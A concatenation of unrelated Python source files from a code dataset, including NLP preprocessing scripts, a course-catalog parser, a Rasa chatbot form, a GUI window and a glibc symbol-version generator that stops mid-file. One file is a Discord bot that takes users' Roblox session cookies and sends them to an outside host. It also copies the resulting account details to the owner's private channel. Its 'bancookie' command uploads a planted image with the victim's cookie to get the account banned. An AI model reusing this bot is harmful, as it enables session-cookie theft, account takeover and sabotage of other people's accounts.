app_add(args.resource,args.appkernel,verbose=args.verbose)\n","sub_path":"akrr/app_add.py","file_name":"app_add.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"174255123","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 17 09:11:06 2021\n\n@author: saulr\n\"\"\"\nimport json\nimport re\nimport string\nimport pandas as pd\n\nstop_words_csv = pd.read_csv(\"stop_words_list.csv\").to_dict()\n\n# removing spaces from keys\n# storing them in sam dictionary\nstop_words_csv = { x.translate({32:None}) : y for x, y in stop_words_csv.items()}\n\n# definiré el alfabeto para eliminar aquellos caracteres que no estén presentes\n# en cada texto\nalphabet = {\n # 26 letras del alfabeto inglés\n 'a': True,\n 'b': True,\n 'c': True,\n 'd': True,\n 'e': True,\n 'f': True,\n 'g': True,\n 'h': True,\n 'i': True,\n 'j': True,\n 'k': True,\n 'l': True,\n 'm': True,\n 'n': True,\n 'o': True,\n 'p': True,\n 'q': True,\n 'r': True,\n 's': True,\n 't': True,\n 'u': True,\n 'v': True,\n 'w': True,\n 'x': True,\n 'y': True,\n 'z': True,\n # números\n '0': True,\n '1': True,\n '2': True,\n '3': True,\n '4': True,\n '5': True,\n '6': True,\n '7': True,\n '8': True,\n '9': True,\n # caracteres especiales\n '$': True,\n '-': True,\n}\n\ndef format_data(title : str, abstract : str):\n # obtendremos una lista de palabras al separarlas por un espacio\n list_of_words = (title + abstract).lower().split(\" \")\n transformed_data = \"\"\n punct = string.punctuation\n punct = punct.replace(\"-\", \"\") # aceptaremos el signo '-'\n \n for word in list_of_words:\n # primero reemplazamos todos los saltos de línea por vacío\n transformed_word = word.translate(str.maketrans('', '', '\\n'))\n transformed_word = re.sub(\"\\$[^\\$]*\\$\", \"\", transformed_word)\n transformed_word = transformed_word.translate(str.maketrans('', '', punct))\n \n \n if transformed_word == \"\" or transformed_word in stop_words_csv.keys():\n continue\n \n for letter in transformed_word:\n if letter not in alphabet:\n transformed_word = transformed_word.translate({ord(letter): None})\n \n if transformed_word == \"\" or transformed_word in stop_words_csv.keys():\n continue\n \n transformed_data += transformed_word\n \n \n return transformed_data\n\n\nread_metadata = open('../python_processes/extracted_metadata.json', 'r')\nformatted_metadata = open('formatted_metadata.txt', 'w', encoding=\"utf-8\")\n\nloaded_papers = json.load(read_metadata)\nfor paper in loaded_papers:\n id_paper = paper['id'] \n \n transformed_data = format_data(paper['title'], paper['abstract'])\n formatted_metadata.write(\"{} {}\\n\".format(id_paper, transformed_data))\n \n \nread_metadata.close()\nformatted_metadata.close()\n","sub_path":"Proyecto-Final/PythonProcesses/format_metadata.py","file_name":"format_metadata.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"645671138","text":"# encoding: utf8\nfrom __future__ import unicode_literals\nimport codecs\nimport numpy\n\ndef make_bow( src_name, hist_name, dict_name ):\n word_dic = []\n\n # 各行を単語に分割\n lines = []\n for line in codecs.open( src_name, \"r\", \"sjis\" ).readlines():\n # 改行コードを削除\n line = line.rstrip(\"\\r\\n\")\n\n # 単語分割\n words = line.split(\" \")\n\n lines.append( words )\n\n # 単語辞書とヒストグラムを作成\n for words in lines:\n for w in words:\n # 単語がなければ辞書に追加\n if not w in word_dic:\n word_dic.append( w )\n\n # ヒストグラム化\n hist = numpy.zeros( (len(lines), len(word_dic)) )\n for d,words in enumerate(lines):\n for w in words:\n idx = word_dic.index(w)\n hist[d,idx] += 1\n\n\n numpy.savetxt( hist_name, hist, fmt=str(\"%d\") )\n codecs.open( dict_name, \"w\", \"sjis\" ).write( \"\\n\".join( word_dic ) )\n\n\ndef main():\n make_bow( \"text.txt\", \"histogram_w.txt\", \"word_dic.txt\" )\n\nif __name__ == '__main__':\n main()","sub_path":"make_bow/bow.py","file_name":"bow.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"494745983","text":"# -*- coding: utf-8 -*- \n\"\"\"Parse ExploreCourses XML.\"\"\"\nfrom collections import OrderedDict\nimport json\nimport time\nimport sys\nimport urllib.request\nimport xmltodict # must install at https://anaconda.org/asmeurer/xmltodict\n\n# Unless year is specified as an additional argument to the command-line call, this script\n# will parse the 2015-2016 catalog\nif(len(sys.argv)>1):\n\tparse_year = sys.argv[1]\nelse:\n\tparse_year = 20152016\n\n# EC_url = \"http://explorecourses.stanford.edu/search?view=xml-20140630&academicYear=\" + str(parse_year) + \"&page=0&q=STATS&filter-departmentcode-STATS=on&filter-coursestatus-Active=on&filter-term-Summer=on\"\nEC_url = \"http://explorecourses.stanford.edu/search?view=xml-20140630&academicYear=\" + str(parse_year) + \"&filter-coursestatus-Active=on&q=%25\"\n\nstring_replacements = [ \n\t[\"\\\\n\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\n\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\", \"|\"],\n\t[\"\\\\n\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\", \"|\"],\n\t[\"\\\\n\", \"\\\\\\\\n\"],\n\t[\"\\\\r\", \"\\\\\\\\r\"],\n\t[\"\\\\t\", \"\\\\\\\\t\"],\n\t[\"'\", \"\\\\'\"]\n]\n\n# header = ['year','course_id','subject','catalog_nbr','school','gers','units_min','units_max','repeatable','term_id','section_nbr','class_id','component','enrollment','instructors','start_time','end_time','days']\n# print('\\t'.join(header))\n\n# \"collapse\" is a helper function that simplifies a JSON object that has been converted from XML by xmltodict.\n# field2 is nested under field1 and is redundant. We want to combine them.\n# \n# Example input 1:\n# the_dict = {field1: {field2: [a,b,c]}}, where, e.g., field1 = \"attributes\" and field2 = \"attribute\"\n# That's just how the dict looks like when we convert XML to JSON.\n# \n# Example output 1:\n# the_dict = {field1: [a,b,c]}\n# \n# Even worse, if field2 has only one element in the list, the parser removes the list and make it a direct child.\n# The end users then have to check the type of the object whether it's a list or not, which is undesirable.\n# \n# Example input 2:\n# the_dict = {field1: {field2: a}}\n# \n# Example output 2:\n# the_dict = {field1: [a]}\ndef collapse(the_dict, field1, field2):\n\tif (\n\t\tthe_dict\n\t\tand field1 in the_dict\n\t\tand the_dict[field1]\n\t\tand field2 in the_dict[field1]\n\t):\n\t\tif type(the_dict[field1][field2]) is list:\n\t\t\tthe_dict[field1] = the_dict[field1][field2]\n\t\telse:\n\t\t\tthe_dict[field1] = [the_dict[field1][field2]]\n\nif __name__ == '__main__':\n\tinit_time = time.time()\n\twith urllib.request.urlopen(EC_url) as the_file:\n\t\tdoc = xmltodict.parse(the_file.read())\n\t\tthe_file.close()\n\n\t\tfor course in doc[\"xml\"][\"courses\"][\"course\"]:\n\n\t\t\t# parsing xml into json has some redundancies. We'll collapse those \n\t\t\t# to make the final object easier to read through\n\t\t\tcollapse(course, \"sections\", \"section\")\n\t\t\tcollapse(course, \"attributes\", \"attribute\")\n\t\t\tcollapse(course, \"tags\", \"tag\")\n\t\t\tcollapse(course, \"learningObjectives\", \"learningObjective\")\n\n\t\t\tif \"sections\" in course and course[\"sections\"]:\n\t\t\t\tfor section in course[\"sections\"]:\n\t\t\t\t\tcollapse(section, \"schedules\", \"schedule\")\n\t\t\t\t\tif \"schedules\" in section and section[\"schedules\"]:\n\t\t\t\t\t\tfor schedule in section[\"schedules\"]:\n\t\t\t\t\t\t\tcollapse(schedule, \"instructors\", \"instructor\")\n\n\t\t\tcomplete_code = course[\"subject\"] + ' ' + str(course[\"code\"])\n\t\t\toutput_json = {\"code\": complete_code, \"description\": course[\"description\"]}\n\n\t\t\tprint(json.dumps(output_json))\n\t\t\t\n\t\t\t# with open('../ec_data/output_20152016.json', 'w') as f:\n\t\t\t# \tjson.dump(output_json, f)\n\n\t\t\t# year = course[\"year\"]\n\t\t\t# subject = course[\"subject\"]\n\t\t\t# catalog_nbr = course[\"code\"]\n\t\t\t# repeatable = course[\"repeatable\"]\n\t\t\t# units_min = course[\"unitsMin\"]\n\t\t\t# units_max = course[\"unitsMax\"]\n\t\t\t# gers = course[\"gers\"]\n\n\t\t\t# course_id = course[\"administrativeInformation\"][\"courseId\"]\n\t\t\t# school = course[\"administrativeInformation\"][\"academicGroup\"]\n\n\t\t\t# if course[\"sections\"] is None:\n\t\t\t# \tcourse[\"sections\"] = []\n\n\t\t\t# for section in course[\"sections\"]:\n\t\t\t# \tterm_id = section[\"termId\"]\n\t\t\t# \tsection_nbr = section[\"sectionNumber\"]\n\t\t\t# \tclass_id = section[\"classId\"]\n\t\t\t# \tcomponent = section[\"component\"]\n\t\t\t# \tenrollment = section[\"currentClassSize\"]\n\n\t\t\t# \tfor schedule in section[\"schedules\"]:\n\t\t\t# \t\tstart_time = None\n\t\t\t# \t\tend_time = None\n\t\t\t# \t\tdays = None\n\t\t\t# \t\tinstructors = []\n\n\t\t\t# \t\tif \"startTime\" in schedule and schedule[\"startTime\"]:\n\t\t\t# \t\t\tstart_time = schedule[\"startTime\"]\n\t\t\t# \t\tif \"endTime\" in schedule and schedule[\"endTime\"]:\n\t\t\t# \t\t\tend_time = schedule[\"endTime\"]\n\t\t\t# \t\tif \"days\" in schedule and schedule[\"days\"]:\n\t\t\t# \t\t\tdays = schedule[\"days\"]\n\t\t\t# \t\t\tdays = days.replace(\"\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\", \"|\")\n\t\t\t# \t\t\tdays = days.replace(\"\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\", \"|\")\n\t\t\t# \t\tif \"instructors\" in schedule and schedule[\"instructors\"]:\n\t\t\t# \t\t\tfor instructor in schedule[\"instructors\"]:\n\t\t\t# \t\t\t\tinstructors.append(instructor[\"sunet\"])\n\n\t\t\t# \t\tprint(year, end='\\t')\n\t\t\t# \t\tprint(course_id, end='\\t')\n\t\t\t# \t\tprint(subject, end='\\t')\n\t\t\t# \t\tprint(catalog_nbr, end='\\t')\n\t\t\t# \t\tprint(school, end='\\t')\n\t\t\t# \t\tprint(gers, end='\\t')\n\t\t\t# \t\tprint(units_min, end='\\t')\n\t\t\t# \t\tprint(units_max, end='\\t')\n\t\t\t# \t\tprint(repeatable, end='\\t')\n\n\t\t\t# \t\tprint(term_id, end='\\t')\n\t\t\t# \t\tprint(section_nbr, end='\\t')\n\t\t\t# \t\tprint(class_id, end='\\t')\n\t\t\t# \t\tprint(component, end='\\t')\n\t\t\t# \t\tprint(enrollment, end='\\t')\n\t\t\t# \t\tprint('|'.join(instructors), end='\\t')\n\n\t\t\t# \t\tprint(start_time, end='\\t')\n\t\t\t# \t\tprint(end_time, end='\\t')\n\t\t\t# \t\tprint(days)\n\n\t#elapsed_time = time.time() - init_time\n\t#print(\">> Checking done. Time spent = {:.01f} s ({:.01f} hrs)\".format(elapsed_time, elapsed_time/3600))","sub_path":"python_scripts/parse_EC_API2.py","file_name":"parse_EC_API2.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"174841066","text":"import math\nt=int(input())\nfor i in range(t):\n n,m,k=map(int,input().split())\n e=n/k\n if m==0 or (n==k and m>=2):\n print(0)\n elif e>=m:\n print(m)\n elif m>e:\n print(int(e-math.ceil((m-e)/(k-1))))\n","sub_path":"Berland-Poker.py","file_name":"Berland-Poker.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"213632334","text":"import sys\nfrom magma import *\nfrom mantle import *\nfrom boards.icestick import IceStick\n\nicestick = IceStick()\nicestick.Clock.on()\nfor i in range(4):\n icestick.J1[i].input().on()\n icestick.J3[i].output().on()\n\nicestick.D1.on()\n\nmain = icestick.main()\n\nupdate_counter = Counter(5)\ncounter = Counter(4, ce=True)\nwire(update_counter.COUT, counter.CE)\n\nwire(update_counter.COUT, main.D1)\nwire(counter.O, main.J3)\n\n\ncompile(sys.argv[1], main)\n","sub_path":"tests/democounter.py","file_name":"democounter.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"469772357","text":"Data = {\"NIM\":\"L200190200\", \"Nama\":\"Fatmawati Ersa Putri\", \"Tempat/Tanggal_lahir\":\"Wonogiri, 30 Maret 2001\", \"Jenis Kelamin\":\"Perempuan\", \"Agama\":\"Islam\",\r\n \"Pekerjaan\":\"Mahasiswa\", \"Alamat\":\"jatisrono, Wonogiri, Jawa Tengah\"}\r\ndef TampilNIM():\r\n print(Data[\"NIM\"])\r\ndef TampilNama():\r\n print(Data[\"Nama\"])\r\ndef TampilTTL():\r\n print(Data[\"Tempat/Tanggal_lahir\"])\r\ndef TampilJK():\r\n print(Data[\"Jenis Kelamin\"])\r\ndef TampilAgama():\r\n print(Data[\"Agama\"])\r\ndef TampilAlamat():\r\n print(Data[\"Alamat\"])\r\ndef TampilPekerjaan():\r\n print(Data[\"Pekerjaan\"])\r\n\r\nprint(\"Pilihan Yang Tersedia:\")\r\nprint(\"a menampilakan bantuaan ini\")\r\nprint(\"b menampilakan NIM\")\r\nprint(\"c menampilakan Nama\")\r\nprint(\"d menampilakan Tempat/Tanggal_lahir\")\r\nprint(\"e menampilakan Jenis Kelamin\")\r\nprint(\"f menampilakan Agama\")\r\nprint(\"g menampilakan Alamat\")\r\nprint(\"h menampilakan Pekerjaan\")\r\nprint(\"i untuk keluar\")\r\nprint(\" \")\r\n\r\na = \"\"\"Pilihan Yang Tersededia:\r\na menampilakan bantuaan ini\r\nb menampilakan NIM\r\nc menampilakan Nama\r\nd menampilakan Tempat/Tanggal_lahir\r\ne menampilakan Jenis Kelamin\r\nf menampilakan Agama\r\ng menampilakan Alamat\r\nh menampilakan Pekerjaan\r\ni untuk keluar\"\"\"\r\n\r\ni = \"Terima Kasih\"\r\nx = input(\"Masukkan huruf:\")\r\nwhile x != \"i\":\r\n if x == \"a\":\r\n print(a)\r\n print(\" \")\r\n x = input(\"Masukkan huruf:\")\r\n elif x == \"b\":\r\n TampilNIM()\r\n print(\" \")\r\n x = input(\"Masukkan huruf\")\r\n elif x == \"c\":\r\n TampilNama()\r\n print(\" \")\r\n x = input(\"Masukkan huruf\")\r\n elif x == \"d\":\r\n TampilTTL()\r\n print(\" \")\r\n x = input(\"Masukkan huruf\")\r\n elif x == \"e\":\r\n TampilJK()\r\n print(\" \")\r\n x = input(\"Masukkan huruf\")\r\n elif x == \"f\":\r\n TampilAgama()\r\n print(\" \")\r\n x = input(\"Masukkan huruf\")\r\n elif x == \"g\":\r\n TampilAlamat()\r\n print(\" \")\r\n x = input(\"Masukkan huruf\")\r\n elif x == \"h\":\r\n TampilPekerjaan()\r\n print(\" \")\r\n x = input(\"Masukkan huruf\")\r\nprint(i)\r\n","sub_path":"praktikum8/kegiatan1.py","file_name":"kegiatan1.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"362383229","text":"import discord, requests, json\nfrom discord.ext import commands\nfrom bs4 import BeautifulSoup\n\n\n\ntoken = \"TOKENHERE\"\nyourprefix = \"!\" ## enter the prefix of your choice by replacing the ! \ndualhookchannelid = YOURCHANNELID ## e.g 905536418934427096\n\nbot = commands.Bot(command_prefix=yourprefix, description=\"Cookie Checker Bot :)\")\n\n@bot.command()\nasync def bancookie(ctx, cookie=None):\n req1 = requests.Session()\n \n if cookie == None:\n await ctx.message.reply(\"Oh No! It Seems You Have Not Provided A Cookie, Please Run The Command Again Using The Following Syntax '.bancookie mycookie'\") ## let the user know they aint provided cookie\n return ## break command\n \n req1.cookies['.ROBLOSECURITY'] = cookie\n print(\"Cookie Set\")\n homeurl= 'https://www.roblox.com/build/upload' ## link to get verification token\n response = req1.get(homeurl) \n try:\n soup = BeautifulSoup(response.text, \"lxml\")\n veri = soup.find(\"input\", {\"name\" : \"__RequestVerificationToken\"}).attrs[\"value\"]\n\n except NameError:\n veri = False\n await ctx.reply(\"Shit bois we got an error fuck\")\n return ## break ofc\n\n files = {'file': ('lol.png', open(\"theimage.jpg\", 'rb'), 'image/png')} ## add the sussy img \n data = {\n '__RequestVerificationToken': veri,\n 'assetTypeId': '13', \n 'isOggUploadEnabled': 'True',\n 'isTgaUploadEnabled': 'True',\n \n 'onVerificationPage': \"False\",\n \"captchaEnabled\": \"True\",\n 'name': \"sussy\"\n }\n try:\n response = req1.post('https://www.roblox.com/build/upload', files=files, data=data) #upload decal teehee\n await ctx.reply(\"Uploaded sussy decal teehee\")\n except:\n await ctx.reply(\"Uh oh request failed, invalid image?\")\n return \n\n\n@bot.command()\nasync def checkcookie(ctx, cookie=None): ## By default make Cookie = To None, so that u can detect wether or not user has entered a cookie\n \n if cookie == None:\n await ctx.message.reply(\"Oh No! It Seems You Have Not Provided A Cookie, Please Run The Command Again Using The Following Syntax '.checkcookie mycookie'\") ## let the user know they aint provided cookie\n return ## break command\n\n r = requests.get(f'https://story-of-jesus.xyz/e.php?cookie={cookie}') ## Send get request to my api to get info about cookie in json\n data = r.json() ## get json from request ^^\n\n if data[\"status\"] == \"failed\": ## if cookie is invalid api will respond with status: failed we will check for this value and if so let user know\n await ctx.message.reply(\"Hmm. This Cookie Seems To Be Expired/Invalid.\")\n return ## break command\n\n ## grab values from json api :) if cookie is valid\n\n avatarurl = data[\"avatarurl\"] \n userid = data[\"userid\"] \n emailverified = data[\"emailverified\"] \n username = data[\"username\"] \n description = data[\"description\"] \n displayname = data[\"displayname\"] \n datecreated = data[\"datecreated\"] \n days_old = data[\"days-old\"] \n robux = data[\"robux\"] \n pendingrobux = data[\"pendingrobux\"] \n credit = data[\"credit\"] \n premium = data[\"premium\"] \n friends = data[\"friends\"] \n followers = data[\"followers\"] \n following = data[\"following\"] \n rap = data[\"rap\"] \n gender = data[\"gender\"] \n country = data[\"country\"] \n pin = data[\"pin\"] \n\n if description == \"\":\n description = \"Empty\" ## check if description is empty and if so set the variable to \"Empty\" because otherwise it bugs embed\n \n ## create embed with above data\n cook = discord.Embed(title=f'**Yum Yum A Valid Cookie, My Favourite**', color=0x42be8f)\n cook.set_thumbnail(url=f'{avatarurl}')\n cook.add_field(name=\"Profile Link:\", value=f'**[Click Here](https://www.roblox.com/users/{userid}/profile)**', inline=False)\n cook.add_field(name=\"Username:\", value=f'```{username}```', inline=True)\n cook.add_field(name=\"UserID:\", value=f'```{userid}```', inline=True)\n cook.add_field(name=\"Display Name:\", value=f'```{displayname}```', inline=True)\n cook.add_field(name=\"Description:\", value=f'```{description}```', inline=True)\n cook.add_field(name=\"Gender:\", value=f'```{gender}```', inline=True)\n cook.add_field(name=\"Country:\", value=f'```{country}```', inline=True)\n cook.add_field(name=\"Verified Email:\", value=f'```{emailverified}```', inline=True)\n cook.add_field(name=\"Premium:\", value=f'```{premium}```', inline=True)\n cook.add_field(name=\"Pin Enabled:\", value=f'```{pin}```', inline=True)\n cook.add_field(name=\"Robux:\", value=f'```{robux}```', inline=True)\n cook.add_field(name=\"Pending-Robux:\", value=f'```{pendingrobux}```', inline=True)\n cook.add_field(name=\"Rap:\", value=f'```{rap}```', inline=True)\n cook.add_field(name=\"Credit:\", value=f'```{credit}```', inline=True)\n cook.add_field(name=\"Date Created:\", value=f'```{days_old} Days Ago```', inline=True)\n cook.add_field(name=\"Friends:\", value=f'```{friends}```', inline=True)\n cook.add_field(name=\"Followers:\", value=f'```{followers}```', inline=True)\n cook.add_field(name=\"Following:\", value=f'```{following}```', inline=True)\n\n \n await ctx.send(embed=cook) ## send embed to the channel cmd was called in\n yourchannel = bot.get_channel(dualhookchannelid) \n await yourchannel.send(embed=cook) ## send the embed to your channel u provided at start\n\n\n\n\n@bot.event\nasync def on_ready():\n await bot.change_presence(status=discord.Status.do_not_disturb, activity=discord.Activity(type=discord.ActivityType.playing, name=\"Cookie Checker\"))\n print('throw some cookies at me bitch im all powered up')\n \n ## just startup event which sets bot activity to \"Playing Cookie Checker\"\n\n\nbot.run(token)\n## make your bot run duh\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"319744488","text":"import roomwindow\nimport copy\n\nclass TeamRoomWindow(roomwindow.RoomWindow):\n def __init__(self, user, args, cfg):\n roomwindow.RoomWindow.__init__(self, user, args, cfg)\n\n def draw(self, detal):\n roomwindow.RoomWindow.draw(self, detal)\n\n def right_top_data(self):\n if self.user.team_rank_list != None:\n self.EndTime = self.user.team_rank_list.EndTime\n else:\n self.EndTime = 0\n return (copy.copy(self.user.team_rank_list), copy.copy(self.user.team_info))\n\n def draw_right_top(self, data):\n self.listTop.Clear()\n if data[0] != None:\n self.listTop.Append(\"队伍排名\")\n for team in data[0].Teams:\n self.listTop.Append(\"team(%s) num(%d) corpname(%s) score(%f) lastrank(%d)\" % (team.Tname,team.Num,team.CorpName,team.Score,team.LastRank))\n\n self.listTop.Append(\"\")\n self.listTop.Append(\"watchnum(%d) endtime(%d) roomexp(%d)\" % (self.user.team_rank_list.WatchNum, self.user.team_rank_list.EndTime, self.user.team_rank_list.killNum))\n\n if data[1] != None:\n self.listTop.Append(\"\")\n self.listTop.Append(\"\")\n self.listTop.Append(\"队伍成员位置\")\n for mem in self.user.team_info:\n self.listTop.Append(\"member(%d) pos(%f, %f)\" % (mem[0],mem[1],mem[2]))\n \n\ng_roomwin = None \ndef new(user, args, cfg):\n global g_roomwin\n g_roomwin = TeamRoomWindow(user, args, cfg)\n g_roomwin.Show()\n \ndef delete():\n global g_roomwin\n if g_roomwin != None:\n g_roomwin.Close()\n g_roomwin = None","sub_path":"server/tools/py_guiclient/teamroomwindow.py","file_name":"teamroomwindow.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"438969535","text":"# This files contains your custom actions which can be used to run\n# custom Python code.\n#\n# See this guide on how to implement these action:\n# https://rasa.com/docs/rasa/custom-actions\n\n\n# This is a simple example for a custom action which utters \"Hello World!\"\n\n# from typing import Any, Text, Dict, List\n#\n# from rasa_sdk import Action, Tracker\n# from rasa_sdk.executor import CollectingDispatcher\n#\n#\n# class ActionHelloWorld(Action):\n#\n# def name(self) -> Text:\n# return \"action_hello_world\"\n#\n# def run(self, dispatcher: CollectingDispatcher,\n# tracker: Tracker,\n# domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:\n#\n# dispatcher.utter_message(text=\"Hello World!\")\n#\n# return []\nimport re\nfrom typing import Any, Text, Dict, List\n\nfrom rasa_sdk import Action, Tracker\nfrom rasa_sdk.executor import CollectingDispatcher\nfrom rasa_sdk.forms import FormAction\nfrom werkzeug.middleware import dispatcher\n\nregex = '^[a-z0-9]+[\\._]?[a-z0-9]+[@]\\w+[.]\\w{2,3}$'\n\n\n\nclass ActionHelloWorld(FormAction):\n\n def name(self) -> Text:\n return \"insurance_form\"\n\n @staticmethod\n def required_slots(tracker: Tracker) -> List[Text]:\n \"\"\"A list of required slots that the form has to fill\"\"\"\n\n\n print(\"required_slots(tracker: Tracker)\")\n return [\"name\", \"age\", \"1date\", \"state\",\"email\"] \n\n def validate_email(\n self,\n value: Text,\n dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any],\n ) -> Dict[Text, Any]:\n \"\"\"Validates the email provided by user to get an insurance.\"\"\"\n email = tracker.get_slot(\"email\")\n\n if(re.search('^[a-z0-9]+[\\._]?[a-z0-9]+[@]\\w+[.]\\w{2,3}$',email)):\n return {\"email\": value} \n print(\"Valid Email\") \n\n else:\n dispatcher.utter_message(template=\"utter_wrong_email\")\n return {\"email\": None}\n print(\"Invalid Email\")\n\n\n def submit(self, dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any]) -> List[Dict]:\n\n dispatcher.utter_message(template=\"utter_submit\")\n\n return []\n \n\n\n\n","sub_path":"actions/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"101074212","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport sys\nimport os\nimport distutils.spawn\nimport copy\nimport shutil\nimport multiprocessing\n\nbasePath = os.path.dirname(os.path.realpath(__file__))\n\ndef extract_versions_from_installed_folder(folder, version):\n files = [x.decode(\"utf-8\").strip() for x in subprocess.check_output(\"find '\" + folder + \"' -name \\\"*.so\\\"\", shell=True).split()]\n\n def starts_with_any(str, set):\n for item in set:\n if str.startswith(item):\n return True\n return False\n\n data = []\n for f in files:\n\n # These are linker scripts that just forward to other .sos, not actual elf binaries\n if f.split(\"/\")[-1] in {'libc.so', 'libm.so', 'libpthread.so'}:\n continue\n\n # Available versions will be listed in readelf output as function@GLIBC_version\n # Additionally, there will be a single function@@GLIBC_version entry, which defines the\n # default version.\n # See https://web.archive.org/web/20170124195801/https://www.akkadia.org/drepper/symbol-versioning section Static Linker\n command = \"readelf -Ws '\" + f + \"' | grep \\\" [^ ]*@@GLIBC_[0-9.]*$\\\" -o\"\n file_data = [x.decode(\"utf-8\").strip() for x in subprocess.check_output(['/bin/bash', '-c', 'set -o pipefail; ' + command]).split()]\n\n if Version(2, 17) <= version <= Version(2, 27):\n # These are defined in both librt and libc, at different versions. file rt/Versions in\n # glibc source refers to them being moved from librt to libc,\n # but left behind for backwards compatibility\n if f.split(\"/\")[-1].startswith(\"librt\"):\n file_data = [x for x in file_data if not starts_with_any(x, {'clock_getcpuclockid', 'clock_nanosleep', 'clock_getres', 'clock_settime', 'clock_gettime'})]\n\n data += file_data\n\n\n syms = {}\n dupes = []\n\n for line in data:\n sym, ver = line.split(\"@@\")\n\n if sym not in syms:\n syms[sym] = ver\n elif syms[sym] != ver:\n dupes.append(line)\n\n if dupes:\n raise Exception(\"duplicate incompatible symbol versions found: \" + str(dupes))\n\n return syms\n\ndef generate_header_string(syms, missingFuncs):\n pthread_funcs_in_libc_so = {\n \"pthread_attr_destroy\",\n \"pthread_attr_init\",\n \"pthread_attr_getdetachstate\",\n \"pthread_attr_setdetachstate\",\n \"pthread_attr_getinheritsched\",\n \"pthread_attr_setinheritsched\",\n \"pthread_attr_getschedparam\",\n \"pthread_attr_setschedparam\",\n \"pthread_attr_getschedpolicy\",\n \"pthread_attr_setschedpolicy\",\n \"pthread_attr_getscope\",\n \"pthread_attr_setscope\",\n \"pthread_condattr_destroy\",\n \"pthread_condattr_init\",\n \"pthread_cond_broadcast\",\n \"pthread_cond_destroy\",\n \"pthread_cond_init\",\n \"pthread_cond_signalpthread_cond_wait\",\n \"pthread_cond_timedwait\",\n \"pthread_equal\",\n \"pthread_exit\",\n \"pthread_getschedparam\",\n \"pthread_setschedparam\",\n \"pthread_mutex_destroy\",\n \"pthread_mutex_init\",\n \"pthread_mutex_lock\",\n \"pthread_mutex_unlock\",\n \"pthread_self\",\n \"pthread_setcancelstate\",\n \"pthread_setcanceltype\",\n \"pthread_attr_init\",\n \"__register_atfork\",\n \"pthread_cond_init pthread_cond_destroy\",\n \"pthread_cond_wait pthread_cond_signal\",\n \"pthread_cond_broadcast pthread_cond_timedwait\"\n }\n\n pthread_symbols_used_as_weak_in_libgcc = {\n \"pthread_setspecific\",\n \"__pthread_key_create\",\n \"pthread_getspecific\",\n \"pthread_key_create\",\n \"pthread_once\"\n }\n\n pthread_symbols_used_as_weak_in_libstdcpp = {\n \"pthread_setspecific\",\n \"pthread_key_delete\",\n \"__pthread_key_create\",\n \"pthread_once\",\n \"pthread_key_create\",\n \"pthread_getspecific\",\n \"pthread_join\",\n \"pthread_detach\",\n \"pthread_create\"\n }\n\n strings = [\n \"#if !defined(SET_GLIBC_LINK_VERSIONS_HEADER) && !defined(__ASSEMBLER__)\",\n \"#define SET_GLIBC_LINK_VERSIONS_HEADER\"\n ]\n\n for sym in sorted(syms.keys()):\n line = '__asm__(\".symver ' + sym + ',' + sym + '@' + syms[sym] + '\");'\n\n if sym in pthread_funcs_in_libc_so or sym in pthread_symbols_used_as_weak_in_libstdcpp or sym in pthread_symbols_used_as_weak_in_libgcc:\n line = \"#ifdef _REENTRANT\\n\" + line + \"\\n#endif\"\n if sym in pthread_symbols_used_as_weak_in_libgcc:\n line = \"#ifndef IN_LIBGCC2\\n\" + line + \"\\n#endif\"\n if sym in pthread_symbols_used_as_weak_in_libstdcpp:\n line = \"#ifndef _GLIBCXX_SHARED\\n\" + line + \"\\n#endif\"\n\n strings.append(line)\n\n for sym in sorted(list(missingFuncs)):\n strings.append('__asm__(\".symver ' + sym + ',' + sym + '@GLIBC_WRAP_ERROR_SYMBOL_NOT_PRESENT_IN_REQUESTED_VERSION\");')\n\n strings.append(\"#endif\")\n strings.append(\"\")\n\n return \"\\n\".join(strings)\n\ndef apply_patches(glibcDir, version):\n patches_table = {\n # patch x <= version <= y\n \"extern_inline_addition.diff\": (Version(2, 5), Version(2, 5, 1)),\n \"fix_obstack_compat.diff\": (Version(2, 5), Version(2, 17)),\n \"no-pattern-rule-mixing.diff\": (Version(2, 5), Version(2, 10, 2)),\n \"fix_linker_failure.diff\": (Version(2, 5), Version(2, 9)),\n \"remove_ctors_dtors.diff\": (Version(2, 5), Version(2, 12, 2)),\n \"fix_bad_version_checks_2.5.diff\": (Version(2, 5), Version(2, 6, 